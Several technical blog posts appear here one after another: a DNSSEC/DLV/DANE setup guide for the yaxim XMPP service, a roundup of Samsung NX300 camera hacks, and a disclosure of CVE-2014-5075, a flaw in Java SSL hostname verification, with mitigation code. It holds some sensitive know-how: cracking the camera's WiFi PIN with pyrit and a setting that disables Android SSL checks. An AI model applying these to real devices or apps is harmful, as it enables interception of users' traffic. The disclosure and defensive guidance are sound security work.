Configuring the DS (Delegation Signer) Record for yaxim.org
If your domain is on an
already-signed TLD
(like yaxim.org
on .org
), you need to establish a trust link from the
.org
zone to your domain's signature keys (the KSK, to be precise). For
this purpose, the
delegation signer (DS
) record type has
been created.
A DS
record is a signed record in the parent domain (.org
) that identifies
a valid key for a given sub-domain (yaxim.org
). Multiple DS
records can
coexist to allow key rollover. If you are running an important service, you
should create a second KSK, store it in a safe place, and add its DS
in
addition to the currently used one. Should your primary name server go up in
flames, you can recover without waiting for the domain registrar to update
your records.
Exporting the DS Record
To obtain the DS
record, BIND comes with the dnssec-dsfromkey
tool. Just
pipe all your keys into it, and it will output DS
records for the KSKs. We
do not want SHA-1 records any more, so we pass -2
as well to get the SHA-256
record:
$ dig @127.0.0.1 DNSKEY yaxim.org | dnssec-dsfromkey -f - -2 yaxim.org
yaxim.org. IN DS 42199 8 2 35E4E171FC21C6637A39EBAF0B2E6C0A3FE92E3D2C983281649D9F4AE3A42533
This line is what you need to submit to your domain registrar (using their web interface or by means of a support ticket). The information contained is:
- key tag:
42199
(this is just a numeric ID for the key, useful for key rollovers) - signature algorithm:
8
(RSA / SHA-256) - DS digest type:
2
(SHA-256) - hash value:
35E4E171...E3A42533
However, some registrars insist on creating the DS
record themselves, and
require you to send in your DNSKEY
. We only need to give them the KSK (type
257), so we filter the output accordingly:
$ dig @127.0.0.1 DNSKEY yaxim.org | grep 257
yaxim.org. 86400 IN DNSKEY 257 3 8
AwEAAcDCzsLhZT849AaG6gbFzFidUyudYyq6NHHbScMl+PPfudz5pCBt
G2AnDoqaW88TiI9c92x5f+u9Yx0fCiHYveN8XE2ed/IQB3nBW9VHiGQC
CliM0yDxCPyuffSN6uJNVHPEtpbI4Kk+DTcweTI/+mtTD+sC+w/CST/V
NFc5hV805bJiZy26iJtchuA9Bx9GzB2gkrdWFKxbjwKLF+er2Yr5wHhS
Ttmvntyokio+cVgD1UaNKcewnaLS1jDouJ9Gy2OJFAHJoKvOl6zaIJuX
mthCvmohlsR46Sp371oS79zrXF3LWc2zN67T0fc65uaMPkeIsoYhbsfS
/aijJhguS/s=
Validation of the Trust Chain
As soon as the record is updated, you can check the trustworthiness of your
domain. Unfortunately, all of the available command-line tools suck. One of
the least-sucking ones is drill
from
ldns. It still needs a root.key
file that contains the officially trusted DNSSEC key for the .
(root)
domain. In Debian, the
dns-root-data package
places it under /usr/share/dns/root.key
. Let's drill
our domain name with
DNSSEC (-D
), tracing from the root zone (-T
), quietly (-Q
):
$ drill -DTQ -k /usr/share/dns/root.key yaxim.org
;; Number of trusted keys: 1
;; Domain: .
[T] . 172800 IN DNSKEY 256 3 8 ;{id = 48613 (zsk), size = 1024b}
. 172800 IN DNSKEY 257 3 8 ;{id = 19036 (ksk), size = 2048b}
[T] org. 86400 IN DS 21366 7 1 e6c1716cfb6bdc84e84ce1ab5510dac69173b5b2
org. 86400 IN DS 21366 7 2 96eeb2ffd9b00cd4694e78278b5efdab0a80446567b69f634da078f0d90f01ba
;; Domain: org.
[T] org. 900 IN DNSKEY 257 3 7 ;{id = 9795 (ksk), size = 2048b}
org. 900 IN DNSKEY 256 3 7 ;{id = 56198 (zsk), size = 1024b}
org. 900 IN DNSKEY 256 3 7 ;{id = 34023 (zsk), size = 1024b}
org. 900 IN DNSKEY 257 3 7 ;{id = 21366 (ksk), size = 2048b}
[T] yaxim.org. 86400 IN DS 42199 8 2 35e4e171fc21c6637a39ebaf0b2e6c0a3fe92e3d2c983281649d9f4ae3a42533
;; Domain: yaxim.org.
[T] yaxim.org. 86400 IN DNSKEY 257 3 8 ;{id = 42199 (ksk), size = 2048b}
yaxim.org. 86400 IN DNSKEY 256 3 8 ;{id = 6384 (zsk), size = 2048b}
[T] yaxim.org. 3600 IN A 83.223.75.29
;;[S] self sig OK; [B] bogus; [T] trusted
The above output traces from the initially trusted .
key to org
, then to
yaxim.org
and determines that yaxim.org is properly DNSSEC-signed and
therefore trusted ([T]
). This is already a big step, but the tool lacks some
color, and it does not allow to explicitly query the domain's name servers
(unless they are open resolvers), so you can't test your config prior to going
live.
To get a better view of our DNSSEC situation, we can query some online services:
- DNS Viz by Sandia Labs: yaxim.org results
- DNSSEC Debugger by Verisign: yaxim.org results
- Livetest by Lutz Donnerhacke: yaxim.org results (German, and you need to click through the HTTPS warnings)
Ironically, neither DNSViz nor Verisign support encrypted connections via HTTPS, and Lutz' livetest is using an untrusted root.
Enabling DNSSEC Look-aside Validation for yax.im
Unfortunately, we can not do the same with our short and shiny yax.im
domain.
If we try to drill it, we get the following:
$ drill -DTQ -k /usr/share/dns/root.key yax.im
;; Number of trusted keys: 1
;; Domain: .
[T] . 172800 IN DNSKEY 256 3 8 ;{id = 48613 (zsk), size = 1024b}
. 172800 IN DNSKEY 257 3 8 ;{id = 19036 (ksk), size = 2048b}
[T] Existence denied: im. DS
;; Domain: im.
;; No DNSKEY record found for im.
;; No DS for yax.im.;; Domain: yax.im.
[S] yax.im. 86400 IN DNSKEY 257 3 8 ;{id = 17389 (ksk), size = 2048b}
yax.im. 86400 IN DNSKEY 256 3 8 ;{id = 24870 (zsk), size = 2048b}
[S] yax.im. 3600 IN A 83.223.75.29
;;[S] self sig OK; [B] bogus; [T] trusted
There are two pieces of relevant information here:
[T] Existence denied: im. DS
- the top-level zone assures that .IM is not DNSSEC-signed (it has noDS
record).[S] yax.im. 3600 IN A 83.223.75.29
- yax.im is self-signed, providing no way to check its authenticity.
The .IM top-level domain for Isle of Man is operated by Domicilium. A friendly support request reveals the following:
Unfortunately there is no ETA for DNSSEC support at this time.
That means there is no way to create a chain of trust from the root zone to yax.im.
Fortunately, the desingers of DNSSEC anticipated this problem. To accelerate adoption of DNSSEC by second-level domains, the concept of look-aside validation was introduced in 2006. It allows to use an alternative trust root if the hierarchical chaining is not possible. The ISC is even operating such an alternative trust root. All we need to do is to register our domain with them, and add them to our resolvers (because they aren't added by default).
After registering with DLV, we are asked to add our domain with its respective
KSK domain key entry. To prove domain and key ownership, we must further
create a signed TXT
record under dlv.yax.im
with a specific value:
dlv.yax.im. IN TXT "DLV:1:fcvnnskwirut"
Afterwards, we request DLV to check our domain. It queries all of the domains' DNS servers for the relevant information and compares the results. Unfortunately, our domain fails the check:
FAILURE 69.36.225.255 has extra: yax.im. 86400 IN DNSKEY 256 3 RSASHA256 ( AwEAAepYQ66j42jjNHN50gUldFSZEfShF...
FAILURE 69.36.225.255 has extra: yax.im. 86400 IN DNSKEY 257 3 RSASHA256 ( AwEAAcB7Fx3T/byAWrKVzmivuH1bpP5Jx...
FAILURE 69.36.225.255 missing: YAX.IM. 86400 IN DNSKEY 256 3 RSASHA256 ( AwEAAepYQ66j42jjNHN50gUldFSZEfShF...
FAILURE 69.36.225.255 missing: YAX.IM. 86400 IN DNSKEY 257 3 RSASHA256 ( AwEAAcB7Fx3T/byAWrKVzmivuH1bpP5Jx...
FAILURE This means your DNS servers are out of sync. Either wait until the DNSKEY data is the same, or fix your server's contents.
This looks like a combination of two different issues:
- A part of our name servers is returning
YAX.IM
when asked foryax.im
. - The DLV script is case-sensitive when it comes to domains.
Problem #1 is officially not a problem. DNS is case-insensitive, and therefore all clients that fail to accept YAX.IM answers to yax.im requests are broken. In practice, this hits not only the DLV resolver (problem #2), but also the resolver code in Erlang, which is used in the widely-deployed ejabberd XMPP server.
While we can't fix all the broken servers out there, #2 has been reported and fixed, and hopefully the fix has been rolled out to production already. Still, issue #1 needs to be solved.
It turns out that it is caused by
case insensitive response compression.
You can't make this stuff up!
Fortunately,
BIND 9.9.6
added the no-case-compress
ACL, so "all you need to do" is to upgrade BIND and
enable that shiny new feature.
After checking and re-checking the dlv.yax.im TXT record with DLV, there is finally progress:
SUCCESS DNSKEY signatures validated.
...
SUCCESS COOKIE: Good signature on TXT response from <NS IP>
SUCCESS <NS IP> has authentication cookie DLV:1:fcvnnskwirut
...
FINAL_SUCCESS Success.
After your domain got validated, it will receive its look-aside validation records under dlv.isc.org:
$ dig +noall +answer DLV yax.im.dlv.isc.org
yax.im.dlv.isc.org. 3451 IN DLV 17389 8 2 C41AFEB57D71C5DB157BBA5CB7212807AB2CEE562356E9F4EF4EACC2 C4E69578
yax.im.dlv.isc.org. 3451 IN DLV 17389 8 1 8BA3751D202EF8EE9CE2005FAF159031C5CAB68A
This looks like a real success. Except that nobody is using DLV in their resolvers by default, and DLV will stop operations in 2017.
Until then, you can enable look-aside validation in your BIND and Unbound resolvers.
Lutz' livetest service supports checking DLV-backed domains as well, so let's verify our configuration:
- yax.im results (again, just click through the HTTPS warnings!)
Creating TLSA Records for HTTP and SRV
Now that we have created keys, signed our zones and established trust into them from the root (more or less), we can put more sensitive information into DNS, and our users can verify that it was actually added by us (or one of at most two or three governments: the US, the TLD holder, and where your nameservers are hosted).
This allows us to add a second, independent, trust root to the TLS
certificates we use for our web server (yaxim.org
) as well as for our XMPP
server, by means of TLSA
records.
These record types are defined in RFC 6698 and consist of the following pieces of information:
- domain name (i.e.
www.yaxim.org
) - certificate usage (is it a CA or a server certificate, is it signed by a "trusted" Root CA?)
- selector + matching type + certificate association data (the actual certificate reference, encoded in one of multiple possible forms)
Domain Name
The domain name is the hostname in the case of HTTPS, but it's slightly
more complicated for the XMPP SRV
record, because there we have the service
domain (yax.im
), the conference domain (chat.yax.im
) and the actual server
domain name (xmpp.yaxim.org
).
The behavior for SRV
TLSA
handling is defined in
RFC 7673,
published as Proposed Standard in October 2015.
First, the
client must validate that the SRV
response for the service domain is properly
DNSSEC-signed. Only then the client can trust that the server named in the
SRV
record is actually responsible for the service.
In the next step,
the client must ensure that the address response (A
for IPv4 and AAAA
for
IPv6) is DNSSEC-signed as well, or fall back to the next SRV
record.
If both the SRV
and the A
/AAAA
records are properly signed, the client
must
do a TLSA
lookup
for the SRV
target (which is _5222._tcp.xmpp.yaxim.org
for our client
users, or _5269._tcp.xmpp.yaxim.org
for other XMPP servers connecting to us).
Certificate Usage
The certificate usage field can take one of four possible values. Translated into English, the possibilities are:
- "trusted" CA - the provided cert is a CA cert that is trusted by the client, and the server certificate must be signed by this CA. We could use this to indicate that our server only will use StartSSL-issued certificates.
- "trusted" server certificate - the provided cert corresponds to the certificate returned over TLS and must be signed by a trusted Root CA. We will use this to deliver our server certificate.
- "untrusted" CA - the provided CA certificate must be the one used to sign the server's certificate. We could roll out a private CA and use this type, but it would cause issues with non-DNSSEC clients.
- "untrusted" server certificate - the provided certificate must be the same as returned by the server, and no Root CA trust checks shall be performed.
The Actual Certificate Association
Now that we know the server name for which the certificate is valid and the type of certificate and trust checks to perform, we need to store the actual certificate reference. Three fields are used to encode the certificate reference.
The selector defines
whether the full certificate (0
) or only the
SubjectPublicKeyInfo field (1
)
is referenced. The latter allows to get the server key re-signed by a
different CA without changing the TLSA records. The former could be
theoretically used to put the full certificate into DNS (a rather bad idea for
TLS, but might be interesting for S/MIME certs).
The matching type field defines how the "selected" data (certificate or SubjectPublicKeyInfo) is stored:
- exact match of the whole "selected" data
- SHA-256 hash of the "selected" data
- SHA-512 hash of the "selected" data
Finally, the certificate association data is the certificate/SubjectPublicKeyInfo data or hash, as described by the previous fields.
Putting it all Together
A good configuration for our service is a record based on a CA-issued server
certificate (certificate usage 1
), with the full certificate (selector 0
)
hashed via SHA-256 (matching type 1
). We can obtain the required association
data using OpenSSL command line tools:
openssl x509 -in yaxim.org-2014.crt -outform DER | openssl sha256
(stdin)= bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9
Taken together, this results in the following entries for HTTPS on yaxim.org and www.yaxim.org:
_443._tcp.yaxim.org IN TLSA 1 0 1 bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9
_443._tcp.www.yaxim.org IN TLSA 1 0 1 bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9
This is also the SHA-256 fingerprint you can see in your web browser.
For the XMPP part, we need to add TLSA records for the SRV targets
(_5222._tcp.xmpp.yaxim.org
for clients and _5269._tcp.xmpp.yaxim.org
for
servers). There should be no need to make TLSA records for the service domain
(_5222._tcp.yax.im
), because a modern client will always try to resolve SRV
records, and no DNSSEC validation will be possible if that fails.
Here, we take the SHA-256 sum of the yax.im
certificate we obtained from
StartSSL, and create two records with the same type and format as above:
_5222._tcp.xmpp.yaxim.org IN TLSA 1 0 1 cef7f6418b7d6c8e71a2413f302f92fc97e57ec18b36f97a4493964564c84836
_5269._tcp.xmpp.yaxim.org IN TLSA 1 0 1 cef7f6418b7d6c8e71a2413f302f92fc97e57ec18b36f97a4493964564c84836
These fields will be used by DNSSEC-enabled clients to verify the TLS certificate presented by our XMPP service.
Replacing the Server Certificate
Now that the TLSA records are in place, it is not as easy to replace your server certificate as it was before, because the old one is now anchored in DNS.
You need to perform the following steps in order to ensure that all clients will be able to connect at any time:
- Obtain the new certificate
- Create a second set of TLSA records, for the new certificate (keep the old one in place)
- Wait for the configured DNS time-to-live to ensure that all users have received both sets of TLSA records
- Replace the old certificate on the server with the new one
- Remove the old TLSA records
If you fail to add the TLSA records and wait the DNS TTL, some clients will have cached a copy of only the old TLSA records, so they will reject your new server certificate.
Conclusion
DANE for XMPP is a chicken-and-egg problem. As long as there are no servers, it will not be implemented in the clients, and vice versa. However, the (currently unavailable) xmpp.net XMPP security analyzer is checking the DANE validation status, and GSoC 2015 brought us DNSSEC support in minidns, which soon will be leveraged in Smack-based XMPP clients.
With this (rather long) post covering all the steps of a successful DNSSEC implementation, including the special challenges of .IM domains, I hope to pave the way for more XMPP server operators to follow.
Enabling DNSSEC and DANE provides an improvement over the rather broken Root CA trust model, however it is not without controversy. tptacek makes strong arguments against DNSSEC, because it is using outdated crypto and because it doesn't completely solve the government-level MitM problem. Unfortunately, his proposal to "do nothing" will not improve the situation, and the only positive contribution ("use TACK!") has expired in 2013.
Finally, one last technical issue not covered by this post is periodic key rollover; this will be covered by a separate post eventually.
This is the third post in a series covering the Samsung NX300 "Smart" Camera. In the first post, we have analyzed how the camera is interacting with the outside world using NFC and WiFi. The second one showed a method to gain a remote root shell, and it spawned a number of interesting projects. This post is a reference collection of these projects, and a call for collaboration.
Samsung NX300 Firmware Update
First, I want to thank Samsung for fixing the most serious security problems in the NX300 firmware. As of firmware version 1.41, the X server is closed down and there is an option to encrypt the WiFi network spawned by the camera with WPA2:
[v1.41]
1.Add Wi-Fi Privacy Lock function 2.Revision Open Source Licenses
Unfortunately, the provided 8-digit PIN can be cracked in less than one hour using pyrit on a middle-class GPU. While this is far from good security, it requires at least some dedication from the attacker.
Even more unfortunately, Samsung removed autoexec.sh
execution from the
NX300M firmware starting with (or after) 1.11. Dear Samsung engineers, if you
are reading this: please add it back! Executing code from the SD card (without
modifying the firmware image) is a great opportunity, not a security problem!
Most of the mods discussed in this post are leveraging that functionality in a
creative way!
Automatic Photo Backups
Markus A. Kuppe has written a
tutorial for auto-backups of the NX300
using an ftp client on the camera and a Raspberry Pi ftp server. One
interesting bit of information is how to make the camera auto-connect to WiFi
whenever it is turned on, using a custom wpa_supplicant.conf
and DBus:
cp /mnt/mmc/wpa_supplicant.conf /tmp/
/usr/bin/wlan.sh start NL 0x8210
/usr/sbin/connmand -W nl80211 -r
/usr/sbin/net-config
sleep 2
dbus-send --system --type=method_call --print-reply --dest=net.connman \
/net/connman/service/wifi_a0219572b25b_7777772e6c656d6d737465722e6465_managed_psk \
net.connman.Service.Connect
Jonathan Dieter created another backup mechanism using SCP and published the nx300m-autobackup source code. Well done!
Additional Kernel Modules
Markus also provided a short write-up on compiling additional kernel modules, which should allow us to extend the camera's functionality without re-flashing the firmware.
Crypto Photography
The most interesting idea, however, was envisioned by Doug Hickok. He modified the firmware to auto-encrypt photographs using public key cryptography. This allows for very interesting use cases like letting a professional photographer take pictures without allowing him to keep a copy, or for investigative journalists to hide their data tracks.
In the current implementation the pictures are first stored to the SD card and then encrypted and deleted, allowing for undelete attacks. Do not use it in production yet. With some more tweaking, however, it should be possible to make this firmware actually deliver the security promise.
Announcement: Samsung NX Hacks
Seeing how there is a (yet small) community of tinkerers around the NX300 camera, and with the knowledge that a whole range of Samsung NX cameras comes with Tizen-based firmware (NX1, NX200, NX2000, NX300M, ...?), the author has created a repository and a Wiki on GitHub.
Feel free to contribute to the wiki or the project - every input is welcome, starting from transferring information from the blog posts linked above into a more structured form in the wiki, and up to creating firmware modifications to allow for exciting new features.
Full series:
Internet security is hard.
TLS is almost
impossible. Implementing TLS correctly in Java is
Nightmare! While the
higher-level
HttpsURLConnection
and Apache's
DefaultHttpClient
do it (mostly) right, direct users of Java SSL sockets
(SSLSocket
/
SSLEngine
,
SSLSocketFactory
)
are left exposed to Man-in-the-Middle attacks, unless the application
manually checks the hostname against the certificate or employs certificate
pinning.
The
SSLSocket
documentation
claims that the socket provides "Integrity Protection", "Authentication", and
"Confidentiality", even against active wiretappers. That impression is
underscored by rigorous certificate checking performed when connecting, making
it ridiculously hard to run development/test installations. However, these
checks turn out to be completely worthless against active MitM attackers,
because SSLSocket
will happily accept any valid certificate (like for a
domain owned by the attacker). Due to this, many applications using
SSLSocket
can be attacked with little effort.
This problem has been written about, but CVE-2014-5075 shows that it can not be stressed enough.
Affected Applications
This problem affects applications that make use of SSL/TLS, but not HTTPS. The best candidates to look for it are therefore clients for application-level protocols like e-mail (POP3/IMAP), instant messaging (XMPP), file transfer (FTP). CVE-2014-5075 is the respective vulnerability of the Smack XMPP client library, so this is a good starting point.
XMPP Clients
XMPP clients based on Smack (which was fixed on 2014-07-22):
- ChatSecure (fixed in 13.2.0-beta1)
- GTalkSMS (contacted on 2014-07-28)
- MAXS (tracker issue, fixed in 0.0.1.18)
- yaxim and Bruno (fixed in 0.8.8)
- undisclosed Android application (contacted on 2014-07-21)
Other XMPP clients:
- babbler (another XMPP library; fixed on 2014-07-27)
- Conversations (Android client, custom XMPP implementation, fixed in version 0.5)
- Sawim (Android client, contacted on 2014-07-22)
- Stroke (another XMPP client library, fixed in git)
- Tigase (contacted on 2014-07-27)
Not Vulnerable Applications
The following applications have been checked as well, and contained code to
compensate for SSLSocket
s shortcomings:
- Jitsi (OSS conferencing client)
- K9-Mail (Android e-Mail client)
- Xabber (Based on Smack, but using its own hostname verification)
Background: Security APIs in Java
The amount of vulnerable applications can be easily explained after a deep dive into the security APIs provided by Java (and its offsprings). Therefore, this section will handle the dirty details of trust (mis)management in the most important implementations: old Java, new Java, Android and in Apache's HttpClient.
Java SE up to and including 1.6
When network security was added into Java 1.4 with the
JSSE
(and we all know how well security-as-an-afterthought works), two distinct
APIs have been created for
certificate verification
and for hostname verification.
The rationale for that decision was probably that the TLS/SSL handshake
happens at the socket layer, whereas the hostname verification depends on the
application-level protocol (HTTPS at
that time). Therefore, the
X509TrustManager
class for certificate trust checks was integrated into the low-level
SSLSocket
and SSLEngine
classes, whereas the
HostnameVerifier
API was only incorporated into the
HttpsURLConnection
.
The API design was not very future-proof either: X509TrustManager
's
checkClientTrusted()
and
checkServerTrusted()
methods are only passed the certificate and authentication type parameters.
There is no reference to the actual SSL connection or its peer name. The only
workaround to allow hostname verification through this API is by creating a
custom TrustManager
for each connection, and storing the peer's hostname in
it. This is neither elegant nor does it scale well with multiple connections.
The HostnameVerifier
on the other hand has access to both the hostname and
the session, making a full verification possible. However, only
HttpsURLConnection
is making use of a HostnameVerifier
(and is only asking
it if it determines a mismatch between the peer and its certificate, so the
default HostnameVerifier
always fails).
Besides of the default HostnameVerifier
being unusable due to always
failing, the API has another subtle surprise: while the TrustManager
methods
fail by throwing a
CertificateException
,
HostnameVerifier.verify()
simply returns false
if verification fails.
As the API designers realized that users of the raw SSLSocket
might fall
into a certificate verification trap set up by their API, they added a
well-buried warning into the
JSSE reference guide for Java 5,
which I am sure you have read multiple times (or at least printed it and put
it under your pillow):
IMPORTANT NOTE: When using raw
SSLSockets
/SSLEngines
you should always check the peer's credentials before sending any data. TheSSLSocket
/SSLEngine
classes do not automatically verify, for example, that the hostname in a URL matches the hostname in the peer's credentials. An application could be exploited with URL spoofing if the hostname is not verified.
Of course, URLs are only a thing in HTTPS, but you get the point... provided
that you actually have read the reference guide... up to this place. If you
only read the
SSLSocket
marketing reference article,
and thought that you are safe because it does not mention any of the pitfalls:
shame on you!
And even if you did read the warning, there is no hint about how to implement the peer credentials checks. There is no API class that would perform this tedious and error-prone task, and implementing it yourself requires a Ph.D. degree in rocket surgery, as well as deep knowledge of some related Internet standardsx.
x
Side note: even if you do not believe
SSL conspiracy theories,
or theories confirmed facts about the
deliberate manipulation of Internet standards
by NSA and GCHQ, there is one prominent example of how the implementation of
security mechanisms can be aggravated by adding complexity - the
title of RFC 6125:
"Representation and Verification of Domain-Based Application Service Identity within Internet Public Key Infrastructure Using X.509 (PKIX) Certificates in the Context of Transport Layer Security (TLS)".
Apache HttpClient
The Apache HttpClient library is a full-featured HTTP client written in pure Java, adding flexibility and functionality in comparison to the default HTTP implementation.
The Apache library developers came up with their own API interface for
hostname verification,
X509HostnameVerifier
,
that also happens to incorporate Java's HostnameVerifier
interface. The new
methods added by Apache are expected to throw SSLException
when verification
fails, while the old method still returns true
or false
, of course. It is
hard to tell if this interface mixing is adding confusion, or reducing it. One
way or the other, it results in the appropriate glue code:
public final boolean verify(String host, SSLSession session) {
try {
Certificate[] certs = session.getPeerCertificates();
X509Certificate x509 = (X509Certificate) certs[0];
verify(host, x509);
return true;
}
catch(SSLException e) {
return false;
}
}
Based on that interface,
AllowAllHostnameVerifier
,
BrowserCompatHostnameVerifier
,
and
StrictHostnameVerifier
were created, which can actually be plugged into anything expecting a plain
HostnameVerifier
. The latter two also actually perform hostname
verification, as opposed to the default verifier in Java, so they can be used
wherever appropriate. Their difference is:
The only difference between BROWSER_COMPATIBLE and STRICT is that a wildcard (such as "*.foo.com") with BROWSER_COMPATIBLE matches all subdomains, including "a.b.foo.com".
If you can make use of Apache's HttpClient library, just plug in one of these verifiers and have a happy life:
sslSocket = ...;
sslSocket.startHandshake();
HostnameVerifier verifier = new StrictHostnameVerifier();
if (!verifier.verify(serviceName, sslSocket.getSession())) {
throw new CertificateException("Server failed to authenticate as " + serviceName);
}
// NOW you can send and receive data!
Android
Android's designers must have been well aware of the shortcomings of the Java
implementation, and the problems that an application developer might encounter
when testing and debugging. They created the
SSLCertificateSocketFactory
class, which makes a developer's life really easy:
It is available on all Android devices, starting with API level 1.
It comes with appropriate warnings about its security parameters and limitations:
Most
SSLSocketFactory
implementations do not verify the server's identity, allowing man-in-the-middle attacks. This implementation does check the server's certificate hostname, but only for createSocket variants that specify a hostname. When using methods that useInetAddress
or which return an unconnected socket, you MUST verify the server's identity yourself to ensure a secure connection.It provides developers with two easy ways to disable all security checks for testing purposes: a) a static
getInsecure()
method (as of API level 8), and b)On development devices, "setprop socket.relaxsslcheck yes" bypasses all SSL certificate and hostname checks for testing purposes. This setting requires root access.
Uses of the insecure instance are logged via adb:
Bypassing SSL security checks at caller's request
Or, when the system property is set:
*** BYPASSING SSL SECURITY CHECKS (socket.relaxsslcheck=yes) ***
Some time in 2013, a training article about Security with HTTPS and SSL was added, which also features its own section for "Warnings About Using SSLSocket Directly", once again explicitly warning the developer:
Caution: SSLSocket does not perform hostname verification. It is up the your app to do its own hostname verification, preferably by calling
getDefaultHostnameVerifier()
with the expected hostname. Further beware thatHostnameVerifier.verify()
doesn't throw an exception on error but instead returns a boolean result that you must explicitly check.
Typos aside, this is very true advice. The article also covers other common
SSL/TLS related problems like certificate chaining, self-signed certs and SNI.
A must read! The fact that it does not mention the
SSLCertificateSocketFactory
is only a little snag.
Java 1.7+
As of Java 1.7, there is a new abstract class
X509ExtendedTrustManager
that finally unifies the two sides of certificate verification:
Extensions to the X509TrustManager interface to support SSL/TLS connection sensitive trust management.
To prevent man-in-the-middle attacks, hostname checks can be done to verify that the hostname in an end-entity certificate matches the targeted hostname. TLS does not require such checks, but some protocols over TLS (such as HTTPS) do. In earlier versions of the JDK, the certificate chain checks were done at the SSL/TLS layer, and the hostname verification checks were done at the layer over TLS. This class allows for the checking to be done during a single call to this class.
This class extends the checkServerTrusted
and checkClientTrusted
methods
with an additional parameter for the socket reference, allowing the
TrustManager to obtain the hostname that was used for the connection, thus
making it possible to actually verify that hostname.
To retrofit this into the old X509TrustManager
interface, all instances of
X509TrustManager
are internally wrapped into an
AbstractTrustManagerWrapper
that performs hostname verification according
to the socket's
SSLParameters
.
All this happens transparently, all you need to do is to initialize your
socket with the hostname and then set the right params:
SSLParameters p = sslSocket.getSSLParameters();
p.setEndpointIdentificationAlgorithm("HTTPS");
sslSocket.setSSLParameters(p);
If you do not set the endpoint identification algorithm, the socket will behave in the same way as in earlier versions of Java, accepting any valid certificate.
However, if you do run the above code, the certificate will be checked
against the IP address or hostname that you are connecting to. If the service
you are using employs DNS SRV, the
hostname (the actual machine you are connecting to, e.g.
"xmpp-042.example.com
") might differ from the service name (what the user
entered, like "example.com
"). However, the certificate will be issued for
the service name, so the verification will fail. As such protocols are most
often combined with STARTTLS
, you will need to wrap your SSLSocket
around
your plain Socket
, for which you can use the following code:
sslSocket = sslContext.getSocketFactory().createSocket(
plainSocket,
serviceName, /**< set your service name here */
plainSocket.getPort(),
true);
// set the socket parameters here!
API Confusion Conclusion
To summarize the different "platforms":
- If you are on Java 1.6 or earlier, you are screwed!
- If you have Android, use
SSLCertificateSocketFactory
and be happy. - If you have Apache HttpClient, add a
StrictHostnameVerifier.verify()
call right after you connect your socket, and check its return value! - If you are on Java 1.7 or newer, do not forget to set the right
SSLParameters
, or you might still be screwed.
Java SSL In the Literature
There is a large amount of good and bad advice out there, you just need to
be a farmer security expert to separate the wheat from the chaff.
Negative Examples
The most expensive advice is free advice. And the Internet is full of it. First, there is code to let Java trust all certificates, because self-signed certificates are a subset of all certificates, obviously. Then, we have a software engineer deliberately disable certificate validation, because all these security exceptions only get into our way. Even after the Snowden revelations, recipes for disabling SSL certificate validation are still written. The suggestions are all very similar, and all pretty bad.
Admittedly, an encrypted but unvalidated connection is still a little bit better than a plaintext connection. However, with the advent of free WiFi networks and SSL MitM software, everybody with a little energy can invade your "secure" connections, which you use to transmit really sensitive information. The effect of this can reach from funny over embarassing and up to life-threatening, if you are a journalist in a crisis zone.
The personal favorite of the author is this SO question about avoiding the certificate warning message in yaxim, which is caused by MemorizingTrustManager. It is especially amusing how the server's domain name is left intact in the screenshot, whereas the certificate checksums and the self-signed indication are blackened.
Fortunately, the situation on StackOverflow has been improving over the years.
Some time ago, you were overwhelmed with
DO_NOT_VERIFY
HostnameVerifier
s
and all-accepting
DefaultTrustManager
s,
where the authors conveniently forgot to mention that their code turns the big
red "security" switch to OFF.
The better answers on StackOverflow at least come with a warning or even suggest certificate pinning.
Positive Examples
In 2012, Kevin Locke has
created a proper HostnameVerifier
using the internal
sun.security.util.HostnameChecker
class which seems to exist in Java SE 6 and 7. This HostnameVerifier
is
used with AsyncHttpClient
, but is suitable for other use-cases as well.
Fahl et al. have analyzed the sad state of SSL in Android apps in 2012. Their focus was on HTTPS, where they did find a massive amount of applications deliberately misconfigured to accept invalid or mismatching certificates (probably added during app development). In a 2013 followup, they have developed a mechanism to enable certificate checking and pinning according to special flags in the application manifest.
Will Sargent from Terse Systems has an excellent series of articles on everything TLS, with videos, examples and plentiful background information. ABSOLUTELY MUST SEE!
There is even an excellent StackOverflow answer by Bruno, outlining the proper hostname validation options with Java 7, Android and "other" Java platforms, in a very concise way.
Mitigation Possibilities
So you are an app developer, and you get this pesky CertificateException
you
could not care less about. What can you do to get rid of it, in a secure way?
That depends on your situation.
Cloud-Connected App: Certificate Pinning
If your app is always connecting to known-in-advance servers under you control (like only your company's "cloud"), employ Certificate Pinning.
If you want a cheap and secure solution, create your own Certificate Authority (CA) (and guard its keys!), deploy its certificate as the only trusted CA in the app, and sign all your server keys with it. This approach provides you with the ultimate control over the whole security infrastructure, you do not need to pay certificate extortion fees to greedy CAs, and a compromised CA can not issue certificates that would allow to MitM your app. The only drawback is that you might not be as good as a commercial CA at guarding your CA keys, and these are the keys to your kingdom.
To implement the client side, you need to store the CA cert in a key file,
which you can use to create an X509TrustManager
that will only accept server
certificates signed by your CA:
KeyStore ks = KeyStore.getInstance(KeyStore.getDefaultType());
ks.load(new FileInputStream(keyStoreFile), "keyStorePassword".toCharArray());
TrustManagerFactory tmf = TrustManagerFactory.getInstance("X509");
tmf.init(ks);
SSLContext sc = SSLContext.getInstance("TLS");
sc.init(null, tmf.getTrustManagers(), new java.security.SecureRandom());
// use 'sc' for your HttpsURLConnection / SSLSocketFactory / ...
If you rather prefer to trust the establishment (or if your servers are to be used by web browsers as well), you need to get all your server keys signed by an "official" Root CA. However, you can still store that single CA into your key file and use the above code. You just won't be able to switch to a different CA later on if they try to extort more money from you.
User-configurable Servers (a.k.a. "Private Cloud"): TOFU/POP
In the context of TLS, TOFU/POP is neither vegetarian music nor frozen food, but stands for "Trust on First Use / Persistence of Pseudonymity".
The idea behind TOFU/POP is that when you connect to a server for the first time, your client stores its certificate, and checks it on each subsequent connection. This is the same mechanism as used in SSH. If you had no evildoers between you and the server the first time, later MitM attempts will be discovered. OpenSSH displays the following on a key change:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
In case you fell victim to a MitM attack the first time you connected, you will see the nasty warning as soon as the attacker goes away, and can start investigating. Your information will be compromised, but at least you will know it.
